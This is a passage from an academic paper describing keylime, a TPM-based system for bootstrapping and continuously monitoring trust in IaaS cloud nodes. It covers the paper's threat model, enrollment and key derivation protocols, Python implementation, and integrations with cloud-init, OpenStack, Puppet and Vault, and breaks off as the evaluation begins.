To\nmeasure applications, the operating system must support\nmeasurement of applications that are launched, such as the\nLinux Integrity Measurement Architecture [30, 21]. One\nlimitation of approaches like IMA is the inability to mon-\nitor the run-time state of the applications. Nexus aims to\naddress this limitation with a new OS that makes trusted\ncomputing a \frst-class citizen, and supports introspection\nto validate run-time state [37]. Several proposals exist for\nproviding run-time integrity monitoring including LKIM [24]\nand DynIMA [8]. These systems ensure that a running sys-\ntemis in a known state, allowing a veri\fer to validate not\nonly that what was loaded was known, but that it has not\nbeen tampered with while it was running.\nIn addition to operating system validation, others have\nleveraged trusted computing and integrity measurement to\nsupport higher-level services, such as protected access to\ndata when the client is o\u000fine [23], or to enforce access\npolicies on data [26]. Others have proposed mechanisms\nto protect the server from malicious clients, e.g., in online\ngaming [1], or applications from a malicious operating sys-\ntem [6, 7, 15]. However, these proposals do not account for\nthe challenges of migrating applications to a cloud environ-\nment, and often assume existing infrastructure to support\ntrusted computing key management.\nIaaS Cloud Services In the IaaS cloud service model, users\nrequest an individual compute resource to execute their ap-\nplication. For example, users can provision physical hard-\nware, virtual machines, or containers. In this paper, we\nrefer to any of these tenant-provisioned IaaS resources as\ncloud nodes . Users provision nodes either by uploading a\nwhole image to the provider or by con\fguring a pared-down\nbase image that the provider makes available. Users often\nbegin by customizing a provider-supplied image, then create\ntheir own images (using a tool like Packer6) to decrease the\namount of time it takes for a node to become ready.\ncloud-init is a standard cross-provider (e.g., Amazon\nEC2, Microsoft Azure...) mechanism that allows cloud ten-\nants to specify bootstrapping data. It accepts a YAML-\nformatted description of what bootstrapping actions should\nbe taken and supports plugins to take those actions. Exam-\nples of such actions include: adding users, adding package\nrepositories, or running arbitrary scripts. Users of cloud\ncomputing resources at scale typically spawn new cloud in-\nstances using an application programming interface and pass\nalong enough bootstrapping information to allow the in-\nstance to communicate with a con\fguration management\nplatform (such as Chef7or Puppet, etc.) for further instance-\nspeci\fc con\fguration. These bootstrapping instructions are\nnot encrypted, meaning that a provider could intercept se-\ncrets passed via the bootstrapping instructions. In our re-\nsearch, we found that organizations will either (a) send an\nunprotected pre-shared key for Puppet in their cloud-init\nbootstrapping actions, or (b) rely on some weaker method of\nproving identity such as going o\u000b the certi\fcate's common\nname (hostname).\n6https://www.packer.io/\n7https://www.chef.io/chef/3. DESIGN\nTo address the limitations of current approaches, we con-\nsider the union of trusted computing and IaaS to provide\na hardware root-of-trust that tenants leverage to establish\ntrust in the cloud provider's infrastructure and in their own\nsystems running on that infrastructure. This section consid-\ners the threats that keylime addresses, and how to leverage\nexisting trusted computing constructs in a virtualized envi-\nronment while limiting complexity and overhead.\n3.1 Threat Model\nOur goal is to minimize trust in the cloud provider and\ncarefully account for all concessions we must make to enable\ntrusted computing services. We assume the cloud provider is\nsemitrusted, i.e., they are organizationally trustworthy but\nare still susceptible to compromise or malicious insiders. We\nassume the cloud provider has processes, technical controls,\nand policy in place to limit the impact of such compromise\nfrom spreading across their entire infrastructure. Thus, in\nthe semitrusted model, we assume that some fraction of the\ncloud provider's resources may be under the control of the\nadversary (e.g., a rogue system administrator may control a\nsubset of racks in an IaaS region).\nSpeci\fcally, we assume that the adversary can monitor or\nmanipulate compromised portions of the cloud network or\nstorage arbitrarily. We assume that the adversary may not\nphysically tamper with any host's (e.g., hypervisor or bare\nmetal node) CPU, bus, memory, or TPM8. In virtualized en-\nvironments, the security of our system relies upon keeping\ncryptographic keys in VM memory. Therefore, we assume\nthat the provider does not purposefully deploy a hypervisor\nwith the explicit capability to spy on tenant VM memory\n(e.g., Ether [9]). We assume that TPM and system manu-\nfacturers have created the appropriate endorsement creden-\ntials and have some mechanism to test their validity (i.e.,\nsigned certi\fcates)\nFinally, we assume that the attacker's goal is to obtain\npersistent access to a tenant system in order to steal, dis-\nrupt, or deny the tenant's data and services. To accomplish\npersistence the attacker must modify the code loading or\nrunning process. We assume that such modi\fcations would\nbe detected by load-time integrity measurement of the hy-\npervisor or kernel [19], runtime integrity measurement of the\nkernel [24], and integrity measurement of applications [30].\n3.2 Architecture\nTo introduce the architecture of keylime we \frst describe\na simpli\fed architecture for managing trusted computing\nservices for a single organization, or cloud tenant, without\nvirtualization. We then expand this simpli\fed architecture\ninto the full keylime architecture, providing extensions that\nallow layering of provider and tenant trusted computing ser-\nvices and supporting multiple varieties of IaaS execution\nisolation (i.e., bare metal, virtual machines, or containers).\nFigure 3 depicts the full system architecture with layering.\nThe \frst step in bootstrapping the architecture is to create\na tenant-speci\fc registrar. The registrar stores and certi\fes\nthe public AIK s of the TPMs in the tenant's infrastructure.\nIn the simpli\fed architecture, the tenant registrar can be\nhosted outside the cloud in the tenant's own infrastructure\n8This is similar to the threat model assumed by the TPM,\nwhere physical protections are not a strict requirement to\nbe compliant with the speci\fcation.Table 1: Keys used by keylime and their purpose.\nKey Type Purpose\nEK RSA 2048 Permanent TPM credential that identi\fes the TPM hardware.\nSRK RSA 2048 TPM key that protects TPM created private keys when they are stored outside the TPM.\nAIK RSA 2048 TPM key used to sign quotes.\nKe AES-256 Enrollment key created by the registrar and used to activate the AIK.\nKb AES-256 Bootstrap key the tenant creates. keylime securely delivers to the node.\nU; V 256bit random Trivial secret shares of Kb, derived with random 256bit V:U=Kb\bV.\nNK RSA 2048 Non-TPM software key used to protect secret shares U; V in transit.\nNode\rRegistrar\rID,AIKpub,EKpub\rEncEK(H(AIKpub),Ke)\rHMACKe(ID)\nFigure 2: Physical node registration protocol.\nor could be hosted on a physical system in the cloud. The\nregistrar is only a trust root and does not store any tenant\nsecrets. The tenant can decide to trust the registrar only\nafter it attests its system integrity. Since the registrar is a\nsimple a component with static code, verifying its integrity\nis straight forward.\nTo create a registrar, we can leverage existing standards\nfor the creation and validation of AIK s by creating a TCG\nPrivacy CA [38]. To avoid the complexity of managing a\ncomplex PKI and because there's no need for privacy within\na single tenant's resources, we created a registrar that simply\nstores valid TPM AIK public keys indexed by node UUID.\nClients request public AIK s from the registrar through a\nserver-authenticated TLS channel.\nTo validate the AIK s in the registrar, we developed a\nTPM-compatible enrollment protocol (see Figure 2). The\nnode begins by sending its ID and standard TPM creden-\ntials ( EKpub; AIK pub) to the registrar. The registrar then\nchecks the validity of the TPM EK with the TPM manu-\nfacturer. Importantly, the generation and installation of the\nEKby the TPM manufacturer roots the trust upon which\nthe rest of our system relies. If the EKis valid, the regis-\ntrar creates an ephemeral symmetric key Keand encrypts it\nalong with a hash of the public AIK , denoted H(AIK pub),\nwith the TPM EKpub. The node uses the ActivateIden-\ntity TPM command to decrypt Ke. The TPM will only\ndecrypt Keif has EKprivand if it has AIK privcorrespond-\ning to H(AIK pub). The nodes uses an HMAC to prove that\nit can decrypt the ephemeral key Ke. The registrar then\nmarks that AIK as being valid so that it can be used to\nvalidate quotes.\nThe core component of keylime is an out of band cloud\nveri\fer (CV) similar to the one described by Schi\u000bman et\nal. [34]. Each cloud organization will have at least one CV\nthat is responsible for verifying the system state of the orga-\nnization's IaaS resources. The tenant can host the CV in the\nIaaS cloud or on-premises at their own site (we give options\nfor tenant registrar and CV deployment in Section 3.2.1).\nThe CV relies upon the tenant registrar for validating that\ntheAIK s used to sign TPM quotes are valid, or more specif-\nically, that the AIK s are recognized by the tenant as beingassociated with machines (physical or virtual) owned by the\ntenant. The registrar, CV, and cloud node service are the\nonly components in keylime that manage and use keys and\npublic key infrastructures associated with the TPM.\nThe CV participates in a three party key derivation pro-\ntocol (we describe in detail in Section 3.2.2) where the CV\nand tenant cooperate to derive a key, Kb, at the cloud node\nto support initial storage decryption. The tenant uses Kbto\nprotect tenant secrets and trust relationships. The tenant\ncan use this key to unlock either its disk image or to unlock\ntenant-speci\fc con\fguration provided by cloud-init .\nThis protocol is akin to the method by which a user can\nuse the TPM to decrypt his or her disk in a laptop. To allow\nthe decryption key to be used to boot the laptop, the user\nmust enter a password (demonstrating the user's intent) and\nTPM PCRs must match a set of whitelisted integrity mea-\nsurements (demonstrating the validity of the system that\nwill receive the decryption key). In an IaaS cloud environ-\nment, there is neither a trusted console where a user can\nenter a password nor is there a way to pre-seed the TPM\nwith the storage key or measurement whitelist. Our pro-\ntocol uses secret sharing to solve these problems by rely-\ning externally upon the CV for integrity measurement and\nby having the tenant directly interact with the cloud node\nto demonstrate intent to derive a key. The protocol then\nextends beyond bootstrapping to enable continuous system\nintegrity monitoring. The CV periodically polls each cloud\nnode's integrity state to determine if any runtime policies\nhave been violated. The frequency with which the CV re-\nquests and veri\fes each node's integrity state will de\fne the\nlatency between an integrity violation and detection.\nTo cleanly link trust and integrity measurement rooted\nin the TPM to higher-level services, we create a parallel\nsoftware-only PKI and a simple service to manage it. The\ngoal is to remove the need to make each service trusted\ncomputing-aware, e.g. integrating Trusted Network Connect\ninto StrongSwan9. We refer to this parallel software-only\nservice as the software CA. To bootstrap this service, we\nuse the key derivation bootstrap protocol to create a cloud\nnode to host the service. Since the bootstrap key derivation\nprotocol ensures that the node can only derive a key if the\ntenant authorizes it and if the node's integrity state is ap-\nproved, we can encrypt the private key for the software CA\nand pass it to the node upon provisioning. Once established,\nwe can then start other cloud nodes and securely pass them\nkeys signed by this CA. The linkage to the hardware root\nof trust, the secure bootstrapping of relevant keys, and user\nintent to create new resources are again ensured using the\n9https://wiki.strongswan.org/projects/strongswan/wiki/\nTrustedNetworkConnectTPM / Platform Manufacturer Tenant Registrar Tenant CV Software CA (Cloud Node VM) vTPM Cloud Node VM vTPM Tenant \nVirtual Enrollment Bound at manufacturing Bootstrap Key derivation \nIdentity Key Bootstrap Key Kb\rCertificate authority Trust Hypervisor TPM Provider Registrar Deep Quote Provider Whitelist Authority Hypervisor TPM Enrollment \nRevocation Service Signed whitelists \nAIK good? TPM Good? AIK good? vAIK good? \nunwrap Figure 3: Layered keylime trusted computing architecture.\nbootstrap key derivation protocol. Once established, stan-\ndard tools and services like IPsec or Puppet can now directly\nuse the software CA identity credentials that each node now\npossesses.\nTo complete the linkage between the trusted computing\nservices and the software identity keys, we need a mechanism\nto revoke keys in the software PKI when integrity violations\noccur in the trusted computing layer. The CV is responsible\nfor notifying the software CA of these violations. The CV\nincludes metadata about the nature of the integrity viola-\ntion, which allows the software CA to have a response policy.\nThe software CA supports standardized methods for certi\f-\ncate revocation like signed revocation lists or by hosting an\nOCSP responder. To support push noti\fcations of failures,\nthe software CA can also publish signed noti\fcations to a\nmessage bus. This way services that directly support revo-\ncation actions can subscribe to noti\fcations (e.g., to trigger\na re-key in a secret manager like Vault).\n3.2.1 Layering Trust\nWe next expand this architecture to work across the layers\nof virtualization common in today's IaaS environments. Our\ngoal is to create the architecture described previously that\ncleanly links common security services to a trusted com-\nputing layer in a cloud tenant's environment. Thus, in a\nVM hosting environment like Amazon EC2 or OpenStack,\nwe aim to create trusted computing enabled software CAs\nand tenant nodes inside of virtual machine instances. Note\nthat, in a bare-metal provisioning environment like IBM\nSoftlayer10, HaaS [13], or OpenStack Ironic11, we can di-\nrectly utilize the simpli\fed architecture where there is no\ntrust layering.\nWe observe that IaaS-based virtual machines or physical\nhosts all provide a common abstraction of isolated execu-\ntion. Each form of isolated execution in turn needs a root of\ntrust on which to build trusted computing services. Due to\nthe performance and resource limitations of typical TPMs\n(e.g., taking 500 or more milliseconds to generate a quote,\nand only supporting a \fxed number of PCRs), direct multi-\nplexed use of the physical TPM will not scale to the numbers\n10http://www.softlayer.com\n11https://wiki.openstack.org/wiki/Ironicof virtual machines that can be hosted on a single modern\nsystem. As described by Berger et al. [2] and as implemented\nin Xen [10], we utilize a virtualized implementation of the\nTPM. Each VM has its own software TPM (called a vTPM)\nwhose trust is in turn rooted in the hardware TPM of the\nhosting system. The vTPM is isolated from the guest that\nuse it, by running in a separate Xen domain.\nThe vTPM interface is the same as a hardware TPM. The\nonly exception to this, is that the client can request a deep-\nquote12that will get a quote from the hardware TPM in\naddition to getting a quote from the vTPM. These quotes\nare linked together by including a hash of the vTPM quote\nand nonce in the hardware TPM quote's nonce. Deep quotes\nsu\u000ber from the slow performance of hardware TPMs, but as\nwe'll show in later this section, we can limit the use of deep\nquotes while still maintaining reasonable performance and\nscale and maintaining security guarantees.\nTo assure a chain of trust that is rooted in hardware, we\nneed the IaaS provider to replicate some of the trusted com-\nputing service infrastructure in their environment and allow\nthe tenant trusted computing services to query it. Specif-\nically, the provider must establish a registrar for their in-\nfrastructure, must publish an up-to-date signed list of the\nintegrity measurements of their infrastructure (hosted by a\nwhitelist authority service), and may even have their own\nCV. The tenant CV will interact with the whitelist author-\nity service and the provider's registrar to verify deep quotes\ncollected by the infrastructure.\nDespite the fact that most major IaaS providers run closed-\nsource hypervisors and would provide opaque integrity mea-\nsurements [16], we \fnd there is still value in verifying the\nintegrity of the provider's services. By providing a known-\ngood list of integrity measurements, the provider is com-\nmitting to a version of the hypervisor that will be deployed\nwidely across their infrastructure. This prevents a targeted\nattack where the a single hypervisor is replaced with a mali-\ncious version designed to spy on the tenant (e.g., the provider\nis coerced by a government to monitor a speci\fc cloud ten-\n12We use similar notation for quotes as we do for deep quotes,\nDeepQuote AIK;vAIK (nonce; PCR i:di; vPCR j:dj), ex-\ncept that PCRs may be from both physical and virtual sets\nof PCRS. We use virtual PCR #16 to bind data.Node\rTenant \u0000Registrar\rID,vAIKpub,vEKpub\rEncvEK(H(AIKpub),Ke)\rProvider\u0000Registrar\rID\rAIK\rServer\tTLS\tDeepQuoteAIK,vAIK(H(Ke),\rv16:H(ID,vAIKpub,vEKpub))\rOK\rFigure 4: Virtual node registration protocol.\nant). Thus, an attacker must subvert both the code loading\nprocess on all the hypervisors and the publishing and signing\nprocess for known-good measurements. In our semitrusted\nthreat model, we assume the provider has controls and mon-\nitoring which limit the ability of a rogue individual to ac-\ncomplish this.\nAs in Section 3.2, we begin with the establishment of a\ntenant registrar and cloud veri\fer. There are multiple op-\ntions for hosting these services securely: 1) in a bare metal\nIaaS instance with TPM, 2) on-tenant-premises in tenant-\nowned hardware, 3) in a small trusted hardware appliance\ndeployed to the IaaS cloud provider, and 4) in an IaaS vir-\ntual machine. The \frst three of these options rely upon\nthe architecture and protocols we've already discussed. The\nlast option requires the tenant to establish an on-tenant-\npremises CV and use that to bootstrap the tenant registrar\nand CV. This on-tenant-premises CV identi\fes and checks\nthe integrity of the tenant's virtualized registrar and CV,\nwho then in turn are responsible for the rest of the tenant's\nvirtualized infrastructure.\nThe primary motivations for a tenant choosing between\nthese options are the detection latency for integrity viola-\ntions, scale of IaaS instances in their environment, band-\nwidth between the tenant and the IaaS cloud, and cost. Op-\ntion 1 provides maximum performance but at higher cost.\nOption 2 will by limited by bandwidth and requires more\ncosts to maintain resources outside of the cloud. Option 3 is\na good trade-o\u000b between cost and performance for a small\ncloud tenant with only tens of nodes or who can tolerate a\nlonger detection latency. Finally, Option 4 provides compat-\nibility with current cloud operations, good performance and\nscalability, and low cost at the expense of increased complex-\nity. In Section 5, we examine the performance trade-o\u000bs of\nthese options including a low-cost registrar and CV appli-\nance (Option 3) we implemented on a Raspberry Pi.\nOnce we have created the tenant registrar and CV, we can\nbegin securely bootstrapping nodes into the environment.\nAs before, the \frst node to establish is a virtualized software\nCA and we do this by creating a private signing key o\u000fine\nand protecting it with a key that will be derived by the\nbootstrap key derivation protocol. The following process\nwill be the same for all tenant cloud nodes. When a node\nboots, it will get a vTPM from the IaaS provider.\nThe process of enrolling a vTPM into the tenant regis-\ntrar needs to securely associate the vTPM credentials, e.g.,\n(vEK ,vAIK ), with a physical TPM in the provider's infras-\ntructure (see Figure 4). The tenant registrar cannot directly\nverify the authenticity of the vEK because it is virtual and\nhas no manufacturer. To address this, we use a deep quote to\nbind the virtual TPM credentials to a physical TPM AIK .\nThe vTPM enrollment protocol begins like the physical\nTPM enrollment protocol by sending ID;(EKpub; AIK pub)to the tenant registrar. The tenant registrar then returns\nEncvEK(H(AIK pub); Ke) without additional checks. The\nvirtual node then decrypts Keusing ActivateIdentity func-\ntion of its vTPM. The node next requests a deep quote using\na hash of Keas the nonce to both demonstrate the freshness\nof the quote and knowledge of Keto the tenant registrar.\nIt also uses virtual PCR #16 to bind the vTPM credentials\nand ID to the deep quote. Upon receiving the deep quote,\nthe tenant registrar asks the provider registrar if the AIK\nfrom the deep quote is valid. The tenant registrar also re-\nquests the latest valid integrity measurement whitelists from\nthe provider. Now the tenant registrar can check the va-\nlidity of the deep quote's signature, ensure that the nonce\nisH(Ke), con\frm the binding data in PCR #16 matches\nwhat was provided in the previous step, and check the phys-\nical PCRs values in the deep quote against the provider's\nwhitelist. Only if the deep quote is valid will the tenant\nregistrar mark the vAIK as being valid.\nWhen considering the cost of performing a deep quote,\nthe provider must carefully consider the additional latency\nof the physical TPM. Deep quotes provide a link between\nthe vTPM and the physical TPM of the machine, and new\nenrollments should always include deep quotes. When con-\nsidering if deep quotes should be used as part of periodic\nattestation, we must understand what trusted computing\ninfrastructure the provider has deployed. If the provider is\ndoing load time integrity only (e.g., secure boot), then deep\nquotes will only re\rect the one-time binding at boot between\nthe vTPM and the physical TPM and the security of the\nvTPM infrastructure. If the provider has runtime integrity\nchecking of their infrastructure, there is value in the ten-\nant performing periodic attestation using deep quotes. In\nthe optimal deployment scenario, the provider can deploy\nkeylime and provide tenants with access to the integrity\nstate of the hypervisors that host tenant nodes. To limit\nthe impact of slow hardware TPM operations, the provider\ncan utilize techniques like batch attestation where multiple\ndeep quote requests from di\u000berent vTPMs can be combined\ninto a single hardware TPM operation [28, 31].\n3.2.2 Key Derivation Protocol\nWe now introduce the details of our bootstrap key deriva-\ntion protocol (Figure 5). The goal of this protocol is for the\ncloud tenant to obtain key agreement with a cloud node they\nhave provisioned in an IaaS system. The protocol relies upon\nthe CV to provide integrity measurement of the cloud node\nduring the protocol. The tenant also directly interacts with\nthe cloud node to demonstrate their intent to spawn that re-\nsource and allow it to decrypt sensitive contents. However,\nthe tenant does not directly perform integrity measurement.\nThis separation of duties is bene\fcial because the attesta-\ntion protocols may operate in parallel and it simpli\fes de-\nployment by centralizing all integrity measurement, white\nlists, and policy in the CV.\nTo begin the process, the tenant generates a fresh random\nsymmetric encryption key Kb. The cloud tenant uses AES-\nGCM to encrypt the sensitive data to pass to the node dwith\nKb, denoted EncKb(d). The tenant then performs trivial\nsecret sharing to split Kbinto two parts U, which the tenant\nwill retain and pass directly to the cloud node and V, which\nthe tenant will share with the CV to provide to the node\nupon successful veri\fcation of the node's integrity state. To\nobtain these shares the tenant generates a secure randomTenant\rCloud Veri0ier\rNode\rRegistrar\rID, V, IP, port, whitelist\rnCV, mask\rQuoteAIK(nCV,16:H(Nkpub),xi :yi),NKpub\rValid AIK?\rEncNK(V)\rnt\rQuoteAIK(nt,16:H(NKpub))),NKpub\rValid AIK?\r\nA\r\nB\r\nC\rMutual TLS Server TLS No TLS Legend\tEncNK(U),HMACKb(ID)Figure 5: Three Party Bootstrap Key Derivation Protocol.\nvalue Vthe same length as Kband computes U=Kb\bV.\nIn the next phase of the protocol, the tenant requests the\nIaaS provider to instantiate a new resource (i.e., a new vir-\ntual machine). The tenant sends EncKb(d) to the provider\nas part of the resource creation. The data dmay be con\fgu-\nration metadata like a cloud-init script13. Upon creation,\nthe provider returns a unique identi\fer for the node uuid\nand an IP address at which the tenant can reach the node.\nAfter obtaining the node uuid and IP address, the tenant\nnoti\fes the CV of their intent to boot a cloud node (see area\nAin Figure 5). The tenant connects to the CV over a secure\nchannel, such as mutually authenticated TLS, and provides\nv,uuid, node IP, and a TPM policy. The TPM policy speci-\n\fes a white list of acceptable PCR values to expect from the\nTPM of the cloud node. At this point the CV and tenant\ncan begin the attestation protocol in parallel.\nThe attestation protocol of our scheme is shared between\nthe interactions of the CV and the cloud node ( B) and that\nof the tenant and the cloud node ( C) with only minor dif-\nferences between them (Figure 5). The protocol consists\nof two message volleys the \frst for the initiator (either CV\nor tenant) to request a TPM quote and the second for the\ninitiator to provide a share of Kbto the cloud node upon\nsuccessful validation of the quote. Since we use this pro-\ntocol to bootstrap keys into the system, there are no ex-\nisting software keys with which we create a secure channel.\nThus, this protocol must securely transmit a share of Kb\nover an untrusted network. We accomplish this by creat-\ning an ephemeral asymmetric key pair on the node, denoted\nNK, outside of the TPM14. As in Section 3.2.1, we use PCR\n#16's value in a TPM quote to bind NK to the identity of\n13Because Kbmay not be re-used in our protocol, the cost\nof re-encrypting large disk images for each node may be\nprohibitive. We advocate for encrypting small sensitive data\npackets like a cloud-init script, and then establish local\nstorage encryption with ephemeral keys.\n14NK could also be generated and reside inside the TPM.\nHowever, since it is ephemeral, is only used for transport\nsecurity and it is authenticated by the TPM using the quote,\nwe found the added complexity of also storing it in the TPM\nunneeded.the TPM thereby authenticating NK. The initiator can\nthen encrypt its share of Kbusing NKpuband securely re-\nturn it to the cloud node.\nThe di\u000berences in the attestation protocol between CV\nand tenant arise in how each validates TPM quotes. Be-\ncause we wish to centralize the adjudication of integrity\nmeasurements to the CV, the TPM quote that the tenant\nrequests only veri\fes the identity of the cloud node's TPM\nand doesn't include any PCR hashes. Since the tenant gen-\nerates a fresh Kbfor each cloud node, we are not concerned\nwith leaking Uto a node with invalid integrity state. Fur-\nthermore, because Vis only one share of Kb, the CV cannot\nbe subverted to decrypt resources without user intent.\nWe now describe the attestation protocol in detail. The\ninitiator \frst sends a fresh nonce ( ntfor the tenant as in B\nfrom Figure 5 and nCVfor the cloud veri\fer as in Cfrom\nFigure 5) to the cloud node along with a mask indicating\nwhich PCRs the cloud node should include in its quote. The\nCV sets the mask based on TPM policy exchanged earlier\nand the tenant creates an empty mask. We extend a hash of\nNKpubinto a freshly reset PCR #16. The initiator requests\na quote from the TPM with the given PCR mask. The node\nthen returns Quote AIK(n;16 :H(NKpub); xi;:yi); NK pub\nto the initiator. Additional PCR numbers xiand values yi\nare only included in the quote returned to the cloud veri\fer\nbased on the TPM policy it requested. During the protocol\nto provide U, the tenant also supplies HMAC Kb(ID) to\nthe node. This provides the node with a quick check to\ndetermine if Kbis correct.\nThe initiator then con\frms that the AIK is valid accord-\ning to the tenant registrar over server authenticated TLS. If\nthe initiator is the CV, then it will also check the other PCRs\nto ensure they are valid according to the tenant-speci\fed\nwhitelist. If the node is virtual, then the quote to the CV\nwill also include a deep quote of the underlying hardware\nTPM. The CV will in turn validate it as described in the\nprevious section. Upon successful veri\fcation, the initiator\ncan then return their share of Kb. Thus, the tenant sends\nEncNK(U) and the cloud veri\fer sends EncNK(V) to the\nnode. The cloud node can now recover Kband proceed withthe boot/startup process.\nThe cloud node does not retain KborVafter decryption\nofd. To support node reboot or migration, the cloud node\nstores Uin the TPM NVRAM to avoid needing the tenant\nto interact again. After rebooting, the node must again\nrequest veri\fcation by the CV to obtain Vand re-derive\nKb. If migration is allowed, the provider must take care to\nalso securely migrate vTPM state to avoid losing U.\n4. IMPLEMENTATION\nWe implemented keylime in approximately 5,000 lines of\nPython in four components: registrar, node, CV, and ten-\nant. We use the IBM Software Trusted Platform module\nlibrary [18] to directly interact with the TPM rather than\ngoing through a Trusted Software Stack (TSS) like Trousers.\nThe registrar presents a REST-based web service for en-\nrolling node AIK s. It also supports a query interface for\nchecking the keys for a given node UUID. The registrar use\nHMAC-SHA384 to check the node's knowledge of Keduring\nregistration.\nThe node component runs on the IaaS machine, VM, or\ncontainer and is responsible for responding to requests for\nquotes and for accepting shares of the bootstrap key Kb. It\nprovides an unencrypted REST-based web service for these\ntwo functions.\nTo support vTPM operations, we created a service the\nIaaS provider runs to manage hardware TPM activation and\nvTPM creation/association. This service runs in a desig-\nnated Xen domain and has privileges to interact with the\nXen vtpmmgr domain [11]. We then implemented a utility\nfor the deep quote operation. Since the Xen vTPM imple-\nmentation does not directly return the PCR values from the\nvirtual TPM (i.e., the shallow quote) during a deep quote,\nwe chose to \frst execute a shallow quote, hash its contents\nwith the provided nonce, and place them in the nonce \feld\nof the deep quote. This operation cryptographically binds\nthem together. This operation is not vulnerable to man-in-\nthe-middle attack since there is no other interface to directly\nmanipulate the nonce of a deep quote [36]. We then return\nboth the shallow and deep quotes and require the veri\fer\nchecks both signatures and sets of PCR values.\nThe cloud veri\fer hosts a TLS-protected REST-based web\nservice for control. Tenants add and remove nodes to be\nveri\fed and also query their current integrity state. Upon\nbeing noti\fed of a new node, the CV enqueues metadata\nabout the node onto the quote_request queue where a con-\n\fgurable pool of worker processes will then request a deep\nquote from the node. Upon successful veri\fcation of the\nquote, the CV will use an HTTP POST to send Vto the\nnode. The CV uses PKCS#1 OAEP and with RSA 2048\nkeys to protect shares of Kbin transit.\nThe tenant generates a random 256-bit AES key and en-\ncrypts and authenticates the bootstrap data using AES with\nGalois Counter Mode [27]. The tenant uses trivial XOR-\nbased secret sharing to split KbintoVandU. The tenant\nexecutes a simpli\fed version of the same protocol that the\nCV uses. The tenant checks with the registrar to determine\nif the quote signing AIK is valid and owned by the tenant.\nUpon receiving UandV, the node can then combine them\nto derive Kb. To limit the impact of rogue CVs or tenants\nconnecting to the node's unauthenticated REST interface,\nthe node stores all received UandVvalues and iteratively\ntries each combination to \fnd the correct Kb. Once thenode has correctly derived Kb, it mounts a small in-memory\n\fle system using tmpfs and writes the key there for other\napplications to access.\n4.1 Integration\nWhile the key derivation protocol of keylime is generic\nand can be used to decrypt arbitrary data, we believe the\nmost natural cloud use-case for it is to decrypt a small IaaS\nnode-speci\fc package of data. To enable this use-case we\nhave integrated keylime with the cloud-init package, the\ncombination we call trusted-cloud-init . As described in\nSection 2, cloud-init is widely adopted mechanism to de-\nploy machine-speci\fc data to IaaS resources. To integrate\nkeylime and cloud-init , we patched cloud-init to sup-\nport AES-GCM decryption of the user-data (where cloud-\ninit stores tenant scripts and data). We modi\fed the up-\nstart system in Ubuntu Linux to start the keylime node\nservice before cloud-init . We then con\fgure cloud-init\nto \fnd the key that keylime creates in the tmpfs mounted\n\fle system. After successful decryption, cloud-init deletes\nthe key and scrubs it from memory.\nTo support applications that need node identities that do\nnot manage their own PKIs, we implemented a simple soft-\nware CA. The tenant provisions the software CA by creating\nthe CA private key o\u000fine and delivering it to a new node\nusing trusted-cloud-init . We also deliver certi\fcates to\nthe software CA that allow it and the tenant to mutually au-\nthenticate each other via trusted-cloud-init . To demon-\nstrate the clean separation between the trusted computing\nlayer and the software key management layer, we use the\nZMQ Curve secure channel implementation [14]. This sys-\ntem uses an elliptic curve cryptography scheme dissimilar\nfrom the cryptographic algorithms, keys, and other tech-\nniques the TPM uses.\nTo enroll a new node, the tenant \frst generates a node\nidentity key pair using the software CA client. The soft-\nware CA supports a plugin architecture that allows the ten-\nant to specify what type of key pairs to create (e.g., X.509\nRSA 2048). The tenant then connects securely to the soft-\nware CA over ZMQ and gets the node's identity certi\fcate\nsigned. The tenant can now provision a new node with this\nidentity using trusted-cloud-init . The software CA also\nsupports receiving noti\fcations from the CV if a node later\nfails integrity measurement.\nTo support transparent integration with an IaaS plat-\nform, we patched OpenStack Nova and libvirt to support\nthe creation of companion vTPM Xen domains for each\nuser created instance. We link the OpenStack UUID to the\nkeylime provider registrar. We then implemented a wrap-\nper for the OpenStack Nova command line interface that\nenables trusted-cloud-init . Speci\fcally, our wrapper in-\ntercepts calls to nova boot and automatically encrypts the\nprovided user-data before passing it to OpenStack. It then\ncalls the keylime tenant, which begins the bootstrapping\nprotocol. This allows OpenStack users to transparently use\nkeylime andcloud-init without needing to fully trust the\nOpenStack provider not to tamper or steal the sensitive con-\ntents of their user-data .\n4.2 Demonstration Applications\nWe next describe how keylime can securely bootstrap\nand handle revocation for existing non-trusted computing-\naware applications and services common to IaaS cloud de-ployments.\nIPsec To enable secure network connectivity similar to\nTNC [39], we implemented trusted-cloud-init scripts to\nautomatically encrypt all network tra\u000ec between a tenant's\nIaaS resources. The scripts use the OpenStack API for IP\naddress information and then build con\fgurations for the\nLinux IPsec stack and raccoon15. This con\fguration is also\neasily extensible to a TLS-based VPN like OpenVPN16.\nPuppet To enable secure system con\fguration manage-\nment, we integrated keylime with Puppet We do so by gen-\nerating the signed RSA keys that Puppet uses to communi-\ncate with the Puppet master using the Software CA process\ndescribed previously. These steps bypass the need to either\nuse the insecure autosign option in the Puppet master to\nblindly accept new nodes or to have an operator manually\napprove/deny certi\fcate signing requests from new nodes.\nTo support continuous attestation and integrity measure-\nment, we implemented a plug-in for the CV that noti\fes the\ntenant's Puppet master when a node fails its integrity mea-\nsurements. The master can then revoke that node's access\nto check-in and receive the latest con\fguration data.\nVault While tools like Puppet are often used to provi-\nsion secrets and keys, tenant operators can instead use a\ndedicated secret management system that supports the full\nlifecycle of cryptographic keys directly. To demonstrate this,\nwe have integrated keylime with Vault, a cloud-compatible\nsecret manager. Like Puppet, we use the Software CA to\nprovision RSA certi\fcates for each node and con\fgure Vault\nto use them. We also implemented a revocation plugin for\nthe CV that noti\fes Vault to both revoke access to a node\nthat fails integrity measurement and to re-generate and re-\ndistribute any keys to which that node had access.\nLUKS Finally, to demonstrate our ability to provision\nsecrets instead of cryptographic identities, we implemented a\ntrusted-clout-init script that provides the key to unlock\nan encrypted volume on boot.\n5. EV ALUATION\nIn this section we evaluate the overhead and scalability of\nkeylime in a variety of scenarios. We ran our experiments\non a private OpenStack cluster, a Xen host, and a Raspberry\nPi. In OpenStack, we used standard instance \ravors where\nthe m1.small has 1 vCPU, 2GB RAM, and a 20GB disk,\nand the m1.large has 4 vCPUs, 8GB RAM, an 80GB disk.\nWe used Ubuntu Linux 14.10 as the guest OS in OpenStack\ninstances. The Xen host had one Xeon E5-2640 CPU with\n6 cores at 2.5Ghz, 10Gbit NIC, 64 GB RAM, a WinBond\nTPM, and ran Xen 4.5 on Ubuntu Linux 15.04. The Rasp-\nberry Pi 2 had one ARMv7 with 4-cores at 900Mhz, 1GB\nRAM, 100Mbit NIC, and ran Raspbian 7. We ran each of\nthe following experiments for 1-2 minutes and present aver-\nages of the performance we observed.\n5.1 TPM Operations\nWe 